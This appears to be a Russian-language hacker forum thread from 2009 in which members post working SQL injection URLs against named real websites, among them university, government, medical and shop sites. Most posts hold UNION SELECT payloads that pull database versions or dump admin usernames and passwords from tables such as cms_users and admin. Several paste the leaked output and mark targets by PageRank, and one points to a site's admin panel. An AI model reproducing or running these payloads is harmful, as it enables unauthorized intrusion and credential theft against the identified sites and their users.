SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://bender.samaratoday.ru/webpage.php?id=19+version()+LIMIT+1,1

    Database Version: 5.1.38
    Database name: samaratoda_ben
    User name: samaratoda_ben@localhost

    есть таблица users:username,passwrd
     
    4 people like this.
  2. SanHuan

    SanHuan Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    12
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://www.artgamma.ru/news.php?id=-191+union+select+1,version%28%29,@@version_compile_os,4,database%28%29,6,7,8,9,10,11,12,13,14,15
     
    6 people like this.
  3. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://www.bridesathotbobbins.co.uk/?pageid=1+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables

    http://www.casauna.se/showimages.php?mode=left&propertyID=1+union+select+concat(0x3a,version(),user(),database())/*

    5.0.32-Debian_7etch11casauna@localhostCasauna
     
    4 people like this.
  4. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    http://www.retronintendo.net/game.php?id=1/**/aNd/**/substring(version(),1,1)=5
    Ветка - 5

    ***

    http://www.feelies.org/game.php?id=1/**/aNd/**/substring(version(),1,1)=3
    ветка - 5

    ***
     
    #10724 [x60]unu, 26 Sep 2009
    Last edited: 27 Sep 2009
    10 people like this.
  5. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    http://www.energieagentur.nrw.de/_infopool/page.asp?InfoID=486+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20--

    [mysqld-5.0.45-community-nt-log


    PR6
     
    5 people like this.
  6. heretic1990

    heretic1990 Elder - Старейшина

    Joined:
    2 Jul 2008
    Messages:
    487
    Likes Received:
    182
    Reputations:
    5
    Code:
    http://www.atomicforce.info/News.php?ID=1+union+all+select+1,version(),3,4,5'
    
    http://www.personnelmanagement.co.uk/main/news.php?id=1+and+1=2+union+all+select+1,2,concat(user_login,char(58),user_password,char(58),user_email),4,5,6,7,8,9,10,11+from+cms_users--'
    
    http://www.yarochester.info/news.php?id=1+union+all+select+1,2,3,4,version(),6'
    
    http://www.wellfield-stud.co.uk/read-news.php?id=1+and+1=2+union+all+select+1,concat(username,char(58),password),3,4+from+%E2%80%8Badlogger_users--'
    
    http://www.filmorder.ir/news.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables'
    
    http://lescompagnonsdelafuste.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10'
    
    http://www.film118.ir/news.php?id=-1+union+select+1,2,3,concat(user,char(58),pass),5+from+user'
    
    http://www.kadinonline.com/news.php?id=1-1+UNION+SELECT+0x65727230722d31--'
    :eek:
     
    #10726 heretic1990, 26 Sep 2009
    Last edited by a moderator: 26 Sep 2009
    6 people like this.
  7. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    http://www.pdamarket.ru/show_cat2.php?grid=-46+union+select+concat_ws%28char%2858%29,username,password%29+from+admin

    http://www.shindaiwa.ru/show_cat2.php?grid=-5+union+select+concat_ws(char(58),username,password)+from+admin
     
    #10727 hackmon, 26 Sep 2009
    Last edited: 26 Sep 2009
    4 people like this.
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Убило

    Полезные статьи по взлому и хакингу

    http://bestxaksoft.ru/article_view.php?id=-1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5/*

    jorikirudik@localhost:h3736_jorikvartanoff:4.1.20-log
     
    _________________________
    #10728 HAXTA4OK, 26 Sep 2009
    Last edited: 26 Sep 2009
    4 people like this.
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    [PR 8] [тиЦ 600]
    Code:
    http://www.nd.edu/~ccl/news.php?id=-6+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5--
     
    8 people like this.
  10. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Code:
    http://www.khartoum-ppu.gov.sd/law_d.php?id=-5+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5--
    felamedc_plan@localhost : felamedc_ppu : 5.0.81-community-log
     
    2 people like this.
  11. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Тут вроде можно заказать журнал хакера =) за 70 уе кажись

    http://www.rustv.de/club/shop/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16--

    rustv@localhost:5.0.51b-community:db25865
     
    _________________________
    2 people like this.
  12. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
     
    2 people like this.
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.cse.salford.ac.uk/news.php?newsID=-226'+union+select+1,2,concat_ws(0x3a3a,username,password),6,5,6,7,8,9,10,11+from+users+/*+

    PR6
    http://www.avalonmedical.co.uk/showjob.php?id=-68'+union+select+1,2,3,concat_ws(0x3a3a,id,username,pwd),5,6,7,8,9+from+users+limit+2,1+/*+

    http://www.jobsintimmins.com/showjob.php?id=-254'+uNioN+seLeCt+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+--+


    http://www.infoserbia.com/jobs/sr/showjob.php?id=429&cid=-443'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+/*+
     
    5 people like this.
  14. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    пр5
    Code:
    http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10--
    jp000297@localhost : jp000297 : 5.0.67
     
    4 people like this.
  15. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    4.1.22:mensaint_main:mensaint_user@localhost

    PR7
     
    #10735 edge911, 27 Sep 2009
    Last edited: 27 Sep 2009
    4 people like this.
  16. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Code:
    http://www.dynamicchiropractic.com/mpacms/dc/article.php?id=-53798+union+select+1,2,3,4,5,6,7,8,9,0,1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,30/*
    -----------------------------------------------------------------------------------------

    PR 6
    http://performingarts.nd.edu/index.php?page=detail&event=-1094+union+select+1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,42+from+mysql.user/*

    Database Version: 4.0.25-standard
    Database name: dpac
    User name: dpac@localhost
     
    #10736 Skofield, 27 Sep 2009
    Last edited: 27 Sep 2009
    6 people like this.
  17. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Извиняюсь, не смог посмотреть офтоп

    Говномания
    http://www.govnomania.ru/admin

    Code:
    http://www.govnomania.ru/index.php?sbjoke_id=-1+union+select+0,1,2,3,%20concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--
    админка там же
     
    4 people like this.
  18. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8

    5.0.51a-24+lenny1elu@10.10.200.1project_management
     
    5 people like this.
  19. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    http://www.lankahub.com/category.php?IndustryID=2+union+select+1,2,concat_ws(0x3a,loginid,password)+from+admin--
     
    1 person likes this.
  20. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    http://codim.org.il - PR=3

    http://codim.org.il/game.php?id=1/**/anD/**/1=2/**/uniON/**/aLl/**/seLEcT/**/1,2,3,version()

    Version = 5.0.67-userstats-log
    User = codim@piratecity.com
    Database = codim1

    3 таблы
    games
    links
    system
     
    3 people like this.
Thread Status:
Not open for further replies.